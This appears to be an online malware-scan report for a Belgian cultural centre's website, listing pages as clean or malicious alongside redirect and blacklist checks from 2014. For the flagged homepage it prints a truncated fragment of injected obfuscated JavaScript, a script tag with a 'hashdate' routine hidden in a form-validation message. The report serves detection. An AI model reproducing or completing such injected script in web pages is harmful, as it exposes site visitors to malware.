Scanned pages/files
Request | Server response | Status |
http://cclibramont.be/ | 200 OK Content-Length: 19403 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) $().ready(function() { $("#newww").validate({ rules: { url: { required: true, email: true } }, messages: { url: "<div style='position:absolute;margin:-40px 0 0 0;width:200px;color:red;' >Entrez un mail valide!<script>function hashdate (str) {if(!str) {var date=new Date();var str = date.getUTCFullYear() + "/" + (date.getUTCMonth()+1) + "/" + date.getUTCDate() + " " + (date.getHours() >= 12 ? 'PM':'AM');};var table = [0,1996959894,3993919788,25675 Antivirus reports:
| ||
http://cclibramont.be/ysite/js/jquery-1.2.6.min.js | 200 OK Content-Length: 55774 Content-Type: application/x-javascript | clean |
http://cclibramont.be/ysite/js/jquery.js | 200 OK Content-Length: 120619 Content-Type: application/x-javascript | clean |
http://cclibramont.be/ysite/js/jquery.validate.js | 200 OK Content-Length: 36436 Content-Type: application/x-javascript | clean |
http://cclibramont.be/ysite/js/cmxforms.js | 200 OK Content-Length: 813 Content-Type: application/x-javascript | clean |
http://cclibramont.be/ysite/js/jquery.cross-slide.js | 200 OK Content-Length: 11047 Content-Type: application/x-javascript | clean |
http://cclibramont.be/index.php | 200 OK Content-Length: 19403 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) $().ready(function() { $("#newww").validate({ rules: { url: { required: true, email: true } }, messages: { url: "<div style='position:absolute;margin:-40px 0 0 0;width:200px;color:red;' >Entrez un mail valide!<script>function hashdate (str) {if(!str) {var date=new Date();var str = date.getUTCFullYear() + "/" + (date.getUTCMonth()+1) + "/" + date.getUTCDate() + " " + (date.getHours() >= 12 ? 'PM':'AM');};var table = [0,1996959894,3993919788,25675 Antivirus reports:
| ||
http://cclibramont.be/agenda.php | 200 OK Content-Length: 11414 Content-Type: text/html | clean |
http://cclibramont.be/ysite/js/jquery.lightbox-0.5.js | 200 OK Content-Length: 19595 Content-Type: application/x-javascript | clean |
http://cclibramont.be/le-theatre-au-centre-culturel.php | 200 OK Content-Length: 8378 Content-Type: text/html | clean |
http://cclibramont.be/en-famille.php | 200 OK Content-Length: 8739 Content-Type: text/html | clean |
http://cclibramont.be/cine-club.php | 200 OK Content-Length: 8532 Content-Type: text/html | clean |
http://cclibramont.be/conferences.php | 200 OK Content-Length: 8576 Content-Type: text/html | clean |
http://cclibramont.be/humour.php | 200 OK Content-Length: 8633 Content-Type: text/html | clean |
http://cclibramont.be/concert.php | 200 OK Content-Length: 8529 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cclibramont.be
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 07 Jun 2014 21:00:19 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8o
Vary: User-Agent
Content-Type: text/html
Set-Cookie: PHPSESSID=d8a6e20bd7ec116fc959aee71b71cae1; expires=Sat, 16-Aug-2014 07:40:20 GMT; path=/
X-Powered-By: PHP/5.2.13-pl0-gentoo
GET / HTTP/1.1
Host: cclibramont.be
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 07 Jun 2014 21:00:19 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8o
Vary: User-Agent
Content-Type: text/html
Set-Cookie: PHPSESSID=d8a6e20bd7ec116fc959aee71b71cae1; expires=Sat, 16-Aug-2014 07:40:20 GMT; path=/
X-Powered-By: PHP/5.2.13-pl0-gentoo
Second query (visit from search engine):
GET / HTTP/1.1
Host: cclibramont.be
Referer: http://www.google.com/search?q=cclibramont.be
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cclibramont.be
Referer: http://www.google.com/search?q=cclibramont.be
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cclibramont.be
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cclibramont.be/
Result: cclibramont.be is not infected or malware details are not published yet.
Result: cclibramont.be is not infected or malware details are not published yet.